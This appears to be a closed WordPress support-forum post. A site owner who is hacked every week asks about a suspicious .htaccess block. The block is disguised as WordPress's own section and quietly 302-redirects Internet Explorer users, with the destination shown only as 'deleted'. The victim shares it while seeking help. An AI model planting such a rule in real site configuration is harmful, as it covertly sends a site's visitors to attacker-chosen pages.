• Hi everyone,

    Every Week my wordpress installation got hacked for some reason.
    When I look in the .htaccess file I see this

    #BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine on
    RewriteCond %{HTTP_USER_AGENT} "MSIE|Trident" [NC]
    RewriteRule ^(.*)$deleted?default [L,R=302]
    </IfModule>
    #END WordPress

    And don’t know what it is and where it come from

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)

The topic ‘WP injected’ is closed to new replies.